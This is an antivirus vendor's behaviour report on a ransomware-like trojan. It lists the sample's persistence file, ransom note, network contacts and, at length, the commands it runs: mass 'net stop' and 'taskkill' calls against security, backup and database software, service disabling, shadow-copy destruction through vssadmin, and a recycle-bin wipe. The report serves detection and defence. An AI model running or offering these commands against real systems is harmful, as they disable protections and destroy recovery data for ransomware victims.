FOR CUSTOMERS

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Trojan.DownLoader34.49176

Added to the Dr.Web virus database: 2020-09-20

Virus description added:

Technical Information

To ensure autorun and distribution
Creates or modifies the following files
  • %APPDATA%\microsoft\windows\start menu\programs\startup\mystartup.lnk
Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Executes the following
  • '<SYSTEM32>\net.exe' stop avpsus /y
  • '<SYSTEM32>\net.exe' stop mfemms /y
  • '<SYSTEM32>\net.exe' stop RESvc /y
  • '<SYSTEM32>\net.exe' stop mfevtp /y
  • '<SYSTEM32>\net.exe' stop sms_site_sql_backup /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$BKUPEXEC /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SOPHOS /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$CITRIX_METAFRAME /y
  • '<SYSTEM32>\net.exe' stop sacsvr /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$CXDB /y
  • '<SYSTEM32>\net.exe' stop SAVAdminService /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$ECWDB2 /y
  • '<SYSTEM32>\net.exe' stop SAVService /y
  • '<SYSTEM32>\net.exe' stop svcGenericHost /y
  • '<SYSTEM32>\net.exe' stop wbengine /y
  • '<SYSTEM32>\net.exe' stop mfefire /y
  • '<SYSTEM32>\net.exe' stop ShMonitor /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$PROD /y
  • '<SYSTEM32>\net.exe' stop Smcinst /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net.exe' stop SmcService /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SBSMONITORING /y
  • '<SYSTEM32>\net.exe' stop SntpService /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SHAREPOINT /y
  • '<SYSTEM32>\net.exe' stop sophossps /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SOPHOS /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SQLEXPRESS /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$PRACTTICEBGC /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$PRACTTICEMGT /y
  • '<SYSTEM32>\net.exe' stop VeeamBackupSvc /y
  • '<SYSTEM32>\net.exe' stop SepMasterService /y
  • '<SYSTEM32>\net.exe' stop MSSQLSERVER /y
  • '<SYSTEM32>\net.exe' stop kavfsslp /y
  • '<SYSTEM32>\net.exe' stop VeeamBrokerSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop klnagent /y
  • '<SYSTEM32>\net.exe' stop VeeamCatalogSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop macmnsvc /y
  • '<SYSTEM32>\net.exe' stop VeeamCloudSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$TPS /y
  • '<SYSTEM32>\net.exe' stop masvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$TPSAMA /y
  • '<SYSTEM32>\net.exe' stop MBAMService /y
  • '<SYSTEM32>\net.exe' stop MySQL80 /y
  • '<SYSTEM32>\net.exe' stop OracleClientCache80 /y
  • '<SYSTEM32>\net.exe' stop McTaskManager /y
  • '<SYSTEM32>\net.exe' stop VeeamEnterpriseManagerSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLServerADHelper /y
  • '<SYSTEM32>\net.exe' stop McAfeeEngineService /y
  • '<SYSTEM32>\net.exe' stop VeeamHvIntegrationSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLServerADHelper100 /y
  • '<SYSTEM32>\net.exe' stop McAfeeFramework /y
  • '<SYSTEM32>\net.exe' stop VeeamMountSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLServerOLAPService /y
  • '<SYSTEM32>\net.exe' stop McAfeeFrameworkMcAfeeFramework /y
  • '<SYSTEM32>\net.exe' stop MySQL57 /y
  • '<SYSTEM32>\net.exe' stop McShield /y
  • '<SYSTEM32>\net.exe' stop VeeamRESTSvc /y
  • '<SYSTEM32>\net.exe' stop VeeamDeploySvc /y
  • '<SYSTEM32>\net.exe' stop MBEndpointAgent /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$SHAREPOINT /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$TPSAMA /y
  • '<SYSTEM32>\taskkill.exe' /IM thebat64.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ocomm.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM infopath.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mbamtray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM zoolz.exe /F
  • '<SYSTEM32>\taskkill.exe' IM thunderbird.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM dbsnmp.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM xfssvccon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Ntrtscan.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM isqlplussvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM onenote.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM PccNTMon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM tbirdconfig.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM dbeng50.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msaccess.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msftesql.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM powerpnt.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM visio.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM winword.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld-nt.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wordpad.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld-opt.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ocautoupds.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ocssd.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oracle.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlagent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlbrowser.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM outlook.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM tmlisten.exe /F
  • '<SYSTEM32>\net.exe' stop SQLAgent$TPS /y
  • '<SYSTEM32>\net.exe' stop swi_filter /y
  • '<SYSTEM32>\taskkill.exe' /IM excel.exe /F
  • '<SYSTEM32>\net.exe' stop swi_update /y
  • '<SYSTEM32>\net.exe' stop swi_update_64 /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$VEEAMSQL2012 /y
  • '<SYSTEM32>\net.exe' stop TmCCSF /y
  • '<SYSTEM32>\net.exe' stop SQLBrowser /y
  • '<SYSTEM32>\net.exe' stop tmlisten /y
  • '<SYSTEM32>\net.exe' stop SQLSafeOLRService /y
  • '<SYSTEM32>\net.exe' stop TrueKey /y
  • '<SYSTEM32>\net.exe' stop SQLSERVERAGENT /y
  • '<SYSTEM32>\net.exe' stop TrueKeyScheduler /y
  • '<SYSTEM32>\net.exe' stop SQLTELEMETRY /y
  • '<SYSTEM32>\taskkill.exe' /IM CNTAoSMgr.exe /F
  • '<SYSTEM32>\net.exe' stop swi_service /y
  • '<SYSTEM32>\taskkill.exe' /IM sqlwriter.exe /F
  • '<SYSTEM32>\net.exe' stop TrueKeyServiceHelper /y
  • '<SYSTEM32>\net.exe' stop vapiendpoint /y
  • '<SYSTEM32>\taskkill.exe' /IM mspub.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mydesktopqos.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mydesktopservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqbcoreservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM firefoxconfig.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM agntsvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM thebat.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM steam.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM encsvc.exe /F
  • '<SYSTEM32>\net.exe' stop SQLTELEMETRY$ECWDB2 /y
  • '<SYSTEM32>\net.exe' stop WRSVC /y
  • '<SYSTEM32>\net.exe' stop mssql$vim_sqlexp /y
  • '<SYSTEM32>\net.exe' stop KAVFSGT /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$SBSMONITORING /y
  • '<SYSTEM32>\net.exe' stop SQLWriter /y
  • '<SYSTEM32>\net.exe' stop CAARCUpdateSvc /y
  • '<SYSTEM32>\net.exe' stop sophos /y
  • '<SYSTEM32>\net.exe' stop “Acronis VSS Provider” /y
  • '<SYSTEM32>\net.exe' stop MsDtsServer /y
  • '<SYSTEM32>\net.exe' stop IISAdmin /y
  • '<SYSTEM32>\net.exe' stop MSExchangeES /y
  • '<SYSTEM32>\net.exe' stop “Sophos Agent” /y
  • '<SYSTEM32>\net.exe' stop EraserSvc11710 /y
  • '<SYSTEM32>\net.exe' stop “Enterprise Client Service” /y
  • '<SYSTEM32>\net.exe' stop “SQL Backups /y
  • '<SYSTEM32>\net.exe' stop MsDtsServer100 /y
  • '<SYSTEM32>\net.exe' stop NetMsmqActivator /y
  • '<SYSTEM32>\net.exe' stop AcronisAgent /y
  • '<SYSTEM32>\net.exe' stop “Sophos Device Control Service” /y
  • '<SYSTEM32>\net.exe' stop AcrSch2Svc /y
  • '<SYSTEM32>\net.exe' stop ReportServer /y
  • '<SYSTEM32>\net.exe' stop “SQLsafe Backup Service” /y
  • '<SYSTEM32>\net.exe' stop MsDtsServer110 /y
  • '<SYSTEM32>\net.exe' stop POP3Svc /y
  • '<SYSTEM32>\net.exe' stop MSExchangeMGMT /y
  • '<SYSTEM32>\net.exe' stop “Sophos Clean Service” /y
  • '<SYSTEM32>\net.exe' stop SMTPSvc /y
  • '<SYSTEM32>\net.exe' stop ReportServer$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop “SQLsafe Filter Service” /y
  • '<SYSTEM32>\net.exe' stop msftesql$PROD /y
  • '<SYSTEM32>\net.exe' stop SstpSvc /y
  • '<SYSTEM32>\net.exe' stop MSExchangeMTA /y
  • '<SYSTEM32>\net.exe' stop “Sophos AutoUpdate Service” /y
  • '<SYSTEM32>\net.exe' stop MSExchangeIS /y
  • '<SYSTEM32>\net.exe' stop SamSs /y
  • '<SYSTEM32>\net.exe' stop BackupExecManagementService /y
  • '<SYSTEM32>\net.exe' stop zhudongfangyu /y
  • '<SYSTEM32>\net.exe' stop mfewc /y
  • '<SYSTEM32>\net.exe' stop BMR Boot Service /y
  • '<SYSTEM32>\net.exe' stop NetBackup BMR MTFTP Service /y
  • '<SYSTEM32>\net.exe' stop DefWatch /y
  • '<SYSTEM32>\net.exe' stop ccEvtMgr /y
  • '<SYSTEM32>\net.exe' stop ccSetMgr /y
  • '<SYSTEM32>\net.exe' stop SavRoam /y
  • '<SYSTEM32>\net.exe' stop RTVscan /y
  • '<SYSTEM32>\net.exe' stop QBFCService /y
  • '<SYSTEM32>\net.exe' stop QBIDPService /y
  • '<SYSTEM32>\net.exe' stop Intuit.QuickBooks.FCS /y
  • '<SYSTEM32>\net.exe' stop QBCFMonitorService /y
  • '<SYSTEM32>\net.exe' stop BackupExecRPCService /y
  • '<SYSTEM32>\net.exe' stop ReportServer$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop McAfeeDLPAgentService /y
  • '<SYSTEM32>\net.exe' stop stc_raw_agent /y
  • '<SYSTEM32>\net.exe' stop VSNAPVSS /y
  • '<SYSTEM32>\net.exe' stop VeeamTransportSvc /y
  • '<SYSTEM32>\net.exe' stop VeeamDeploymentService /y
  • '<SYSTEM32>\net.exe' stop VeeamNFSSvc /y
  • '<SYSTEM32>\net.exe' stop veeam /y
  • '<SYSTEM32>\net.exe' stop PDVFSService /y
  • '<SYSTEM32>\net.exe' stop BackupExecVSSProvider /y
  • '<SYSTEM32>\net.exe' stop BackupExecAgentAccelerator /y
  • '<SYSTEM32>\net.exe' stop BackupExecAgentBrowser /y
  • '<SYSTEM32>\net.exe' stop BackupExecDiveciMediaService /y
  • '<SYSTEM32>\net.exe' stop BackupExecJobEngine /y
  • '<SYSTEM32>\net.exe' stop YooIT /y
  • '<SYSTEM32>\net.exe' stop YooBackup /y
  • '<SYSTEM32>\net.exe' stop CASAD2DWebSvc /y
  • '<SYSTEM32>\net.exe' stop “Symantec System Recovery” /y
  • '<SYSTEM32>\net.exe' stop Antivirus /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SBSMONITORING /y
  • '<SYSTEM32>\net.exe' stop AVP /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SHAREPOINT /y
  • '<SYSTEM32>\net.exe' stop DCAgent /y
  • '<SYSTEM32>\net.exe' stop bedbg /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop EhttpSrv /y
  • '<SYSTEM32>\net.exe' stop MMS /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SQLEXPRESS /y
  • '<SYSTEM32>\net.exe' stop ekrn /y
  • '<SYSTEM32>\net.exe' stop mozyprobackup /y
  • '<SYSTEM32>\net.exe' stop MSSQL$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net.exe' stop “Sophos Web Control Service” /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SBSMONITORING /
  • '<SYSTEM32>\net.exe' stop MSSQL$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop EPUpdateService /y
  • '<SYSTEM32>\net.exe' stop ntrtscan /y
  • '<SYSTEM32>\net.exe' stop MSSQL$TPSAMA /y
  • '<SYSTEM32>\net.exe' stop EsgShKernel /y
  • '<SYSTEM32>\net.exe' stop ESHASRV /y
  • '<SYSTEM32>\net.exe' stop SDRSVC /y
  • '<SYSTEM32>\net.exe' stop MSSQL$VEEAMSQL2012 /y
  • '<SYSTEM32>\net.exe' stop FA_Scheduler /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$VEEAMSQL2008R2 /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net.exe' stop KAVFS /y
  • '<SYSTEM32>\net.exe' stop EPSecurityService /y
  • '<SYSTEM32>\net.exe' stop MSSQL$VEEAMSQL2008R2 /y
  • '<SYSTEM32>\net.exe' stop MSSQL$TPS /y
  • '<SYSTEM32>\net.exe' stop MSSQL$PROD /y
  • '<SYSTEM32>\net.exe' stop MSSQL$PRACTTICEBGC /y
  • '<SYSTEM32>\net.exe' stop MSOLAP$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop MSExchangeSA /y
  • '<SYSTEM32>\net.exe' stop “Sophos File Scanner Service” /y
  • '<SYSTEM32>\net.exe' stop ReportServer$TPS /y
  • '<SYSTEM32>\net.exe' stop “Veeam Backup Catalog Data Service” /y
  • '<SYSTEM32>\net.exe' stop MSOLAP$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop W3Svc /y
  • '<SYSTEM32>\net.exe' stop MSExchangeSRS /y
  • '<SYSTEM32>\net.exe' stop “Sophos Health Service” /y
  • '<SYSTEM32>\net.exe' stop ReportServer$TPSAMA /y
  • '<SYSTEM32>\net.exe' stop “Zoolz 2 Service” /y
  • '<SYSTEM32>\net.exe' stop MSOLAP$TPS /y
  • '<SYSTEM32>\net.exe' stop “aphidmonitorservice” /y
  • '<SYSTEM32>\net.exe' stop msexchangeadtopology /y
  • '<SYSTEM32>\net.exe' stop UI0Detect /y
  • '<SYSTEM32>\net.exe' stop “Sophos MCS Agent” /y
  • '<SYSTEM32>\net.exe' stop “intel(r) proset monitoring service” /y
  • '<SYSTEM32>\net.exe' stop msexchangeimap4 /y
  • '<SYSTEM32>\net.exe' stop “Sophos MCS Client” /y
  • '<SYSTEM32>\net.exe' stop ARSM /y
  • '<SYSTEM32>\net.exe' stop MSSQL$BKUPEXEC /y
  • '<SYSTEM32>\net.exe' stop unistoresvc_1af40a /y
  • '<SYSTEM32>\net.exe' stop “Sophos Message Router” /y
  • '<SYSTEM32>\net.exe' stop MSSQL$ECWDB2 /y
  • '<SYSTEM32>\net.exe' stop audioendpointbuilder /y
  • '<SYSTEM32>\net.exe' stop “Sophos Safestore Service” /y
  • '<SYSTEM32>\net.exe' stop MSSQL$PRACTICEMGT /y
  • '<SYSTEM32>\net.exe' stop “Sophos System Protection Service” /y
  • '<SYSTEM32>\net.exe' stop BackupExecDeviceMediaService /y
  • '<SYSTEM32>\net.exe' stop MSOLAP$TPSAMA /y
  • '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM synctime.exe /F
Modifies file system
Creates the following files
  • %TEMP%\nd1zco3q.exe
  • %TEMP%\how_to_decypher_files.txt
Network activity
TCP
  • 'google.com':443
  • 'ra#.####ubusercontent.com':443
UDP
  • DNS ASK ra#.####ubusercontent.com
  • DNS ASK google.com
Miscellaneous
Searches for the following windows
  • ClassName: 'TaskManagerWindow' WindowName: 'Administrador de tareas'
  • ClassName: '#32770' WindowName: 'Task Manager'
  • ClassName: '#32770' WindowName: ''
  • ClassName: 'SysListView32' WindowName: 'Processes'
  • ClassName: '' WindowName: ''
Executes the following
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
  • '<SYSTEM32>\net1.exe' stop VeeamHvIntegrationSvc /y
  • '<SYSTEM32>\net1.exe' stop MySQL80 /y
  • '<SYSTEM32>\net1.exe' stop VeeamRESTSvc /y
  • '<SYSTEM32>\net1.exe' stop McShield /y
  • '<SYSTEM32>\net1.exe' stop EhttpSrv /y
  • '<SYSTEM32>\net1.exe' stop MMS /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQLEXPRESS /y
  • '<SYSTEM32>\net1.exe' stop ekrn /y
  • '<SYSTEM32>\net1.exe' stop mozyprobackup /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop McAfeeFrameworkMcAfeeFramework /y
  • '<SYSTEM32>\net1.exe' stop VeeamNFSSvc /y
  • '<SYSTEM32>\net1.exe' stop MySQL57 /y
  • '<SYSTEM32>\net1.exe' stop DCAgent /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SHAREPOINT /y
  • '<SYSTEM32>\net1.exe' stop BackupExecVSSProvider /y
  • '<SYSTEM32>\net1.exe' stop AVP /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Web Control Service” /y
  • '<SYSTEM32>\net1.exe' stop BackupExecJobEngine /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$PROD /y
  • '<SYSTEM32>\net1.exe' stop AcronisAgent /y
  • '<SYSTEM32>\net1.exe' stop BackupExecManagementService /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop bedbg /y
  • '<SYSTEM32>\net1.exe' stop MSSQLServerOLAPService /y
  • '<SYSTEM32>\net1.exe' stop McAfeeFramework /y
  • '<SYSTEM32>\net1.exe' stop BackupExecRPCService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SQLEXPRESS /y
  • '<SYSTEM32>\net1.exe' stop svcGenericHost /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop swi_filter /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$TPS /y
  • '<SYSTEM32>\net1.exe' stop swi_service /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop swi_update /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop sophossps /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SHAREPOINT /y
  • '<SYSTEM32>\net1.exe' stop SntpService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SBSMONITORING /y
  • '<SYSTEM32>\net1.exe' stop SmcService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$PRACTTICEBGC /y
  • '<SYSTEM32>\net1.exe' stop SepMasterService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$PRACTTICEMGT /y
  • '<SYSTEM32>\net1.exe' stop ShMonitor /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$PROD /y
  • '<SYSTEM32>\net1.exe' stop Smcinst /y
  • '<SYSTEM32>\net1.exe' stop NetBackup BMR MTFTP Service /y
  • '<SYSTEM32>\net1.exe' stop MSSQLServerADHelper100 /y
  • '<SYSTEM32>\net1.exe' stop Antivirus /y
  • '<SYSTEM32>\net1.exe' stop swi_update_64 /y
  • '<SYSTEM32>\net1.exe' stop VeeamMountSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$SBSMONITORING /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SBSMONITORING /
  • '<SYSTEM32>\net1.exe' stop W3Svc /y
  • '<SYSTEM32>\net1.exe' stop MsDtsServer /y
  • '<SYSTEM32>\net1.exe' stop IISAdmin /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeES /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Agent” /y
  • '<SYSTEM32>\net1.exe' stop EraserSvc11710 /y
  • '<SYSTEM32>\net1.exe' stop wbengine /y
  • '<SYSTEM32>\net1.exe' stop AcrSch2Svc /y
  • '<SYSTEM32>\net1.exe' stop “Sophos File Scanner Service” /y
  • '<SYSTEM32>\net1.exe' stop “Acronis VSS Provider” /y
  • '<SYSTEM32>\net1.exe' stop sophos /y
  • '<SYSTEM32>\net1.exe' stop CAARCUpdateSvc /y
  • '<SYSTEM32>\net1.exe' stop CASAD2DWebSvc /y
  • '<SYSTEM32>\net1.exe' stop SAVAdminService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$CXDB /y
  • '<SYSTEM32>\net1.exe' stop sacsvr /y
  • '<SYSTEM32>\net1.exe' stop mfevtp /y
  • '<SYSTEM32>\net1.exe' stop sms_site_sql_backup /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$BKUPEXEC /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SOPHOS /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$CITRIX_METAFRAME /y
  • '<SYSTEM32>\net1.exe' stop RESvc /y
  • '<SYSTEM32>\net1.exe' stop mfemms /y
  • '<SYSTEM32>\net1.exe' stop BackupExecDiveciMediaService /y
  • '<SYSTEM32>\net1.exe' stop veeam /y
  • '<SYSTEM32>\net1.exe' stop msexchangeadtopology /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$VEEAMSQL2012 /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SOPHOS /y
  • '<SYSTEM32>\net1.exe' stop “Sophos MCS Agent” /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$PRACTTICEBGC /y
  • '<SYSTEM32>\net1.exe' stop BackupExecDeviceMediaService /y
  • '<SYSTEM32>\net1.exe' stop “Sophos System Protection Service” /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$PRACTICEMGT /y
  • '<SYSTEM32>\net1.exe' stop BackupExecAgentBrowser /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Safestore Service” /y
  • '<SYSTEM32>\net1.exe' stop audioendpointbuilder /y
  • '<SYSTEM32>\net1.exe' stop “intel(r) proset monitoring service” /y
  • '<SYSTEM32>\net1.exe' stop msexchangeimap4 /y
  • '<SYSTEM32>\net1.exe' stop “Sophos MCS Client” /y
  • '<SYSTEM32>\net1.exe' stop ARSM /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$BKUPEXEC /y
  • '<SYSTEM32>\net1.exe' stop unistoresvc_1af40a /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Message Router” /y
  • '<SYSTEM32>\net1.exe' stop BackupExecAgentAccelerator /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$ECWDB2 /y
  • '<SYSTEM32>\net1.exe' stop MSOLAP$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop mfefire /y
  • '<SYSTEM32>\net1.exe' stop SAVService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$ECWDB2 /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeSRS /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Health Service” /y
  • '<SYSTEM32>\net1.exe' stop ReportServer$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop “Zoolz 2 Service” /y
  • '<SYSTEM32>\net1.exe' stop MSOLAP$TPS /y
  • '<SYSTEM32>\net1.exe' stop “Enterprise Client Service” /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SBSMONITORING /y
  • '<SYSTEM32>\net1.exe' stop TmCCSF /y
  • '<SYSTEM32>\net1.exe' stop SQLBrowser /y
  • '<SYSTEM32>\net1.exe' stop mssql$vim_sqlexp /y
  • '<SYSTEM32>\net1.exe' stop RTVscan /y
  • '<SYSTEM32>\net1.exe' stop EsgShKernel /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop ntrtscan /y
  • '<SYSTEM32>\net1.exe' stop EPUpdateService /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$TPS /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$VEEAMSQL2008R2 /y
  • '<SYSTEM32>\net1.exe' stop EPSecurityService /y
  • '<SYSTEM32>\net1.exe' stop “Veeam Backup Catalog Data Service” /y
  • '<SYSTEM32>\net1.exe' stop McAfeeDLPAgentService /y
  • '<SYSTEM32>\net1.exe' stop mfewc /y
  • '<SYSTEM32>\net1.exe' stop PDVFSService /y
  • '<SYSTEM32>\net1.exe' stop MSOLAP$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop UI0Detect /y
  • '<SYSTEM32>\net1.exe' stop McTaskManager /y
  • '<SYSTEM32>\net1.exe' stop VeeamTransportSvc /y
  • '<SYSTEM32>\net1.exe' stop OracleClientCache80 /y
  • '<SYSTEM32>\net1.exe' stop SstpSvc /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeMTA /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Device Control Service” /y
  • '<SYSTEM32>\net1.exe' stop ReportServer$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop “Symantec System Recovery” /y
  • '<SYSTEM32>\net1.exe' stop ReportServer$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop ccEvtMgr /y
  • '<SYSTEM32>\net1.exe' stop ReportServer$TPS /y
  • '<SYSTEM32>\net1.exe' stop SavRoam /y
  • '<SYSTEM32>\net1.exe' stop VSNAPVSS /y
  • '<SYSTEM32>\net1.exe' stop “SQLsafe Filter Service” /y
  • '<SYSTEM32>\net1.exe' stop avpsus /y
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY start= disabled
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLWriter start= disabled
  • '<SYSTEM32>\sc.exe' config SstpSvc start= disabled
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • '<SYSTEM32>\cmd.exe' /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • '<SYSTEM32>\net1.exe' stop MSExchangeSA /y
  • '<SYSTEM32>\net1.exe' stop QBFCService /y
  • '<SYSTEM32>\net1.exe' stop QBIDPService /y
  • '<SYSTEM32>\net1.exe' stop Intuit.QuickBooks.FCS /y
  • '<SYSTEM32>\net1.exe' stop QBCFMonitorService /y
  • '<SYSTEM32>\net1.exe' stop YooBackup /y
  • '<SYSTEM32>\net1.exe' stop YooIT /y
  • '<SYSTEM32>\net1.exe' stop zhudongfangyu /y
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • '<SYSTEM32>\net1.exe' stop DefWatch /y
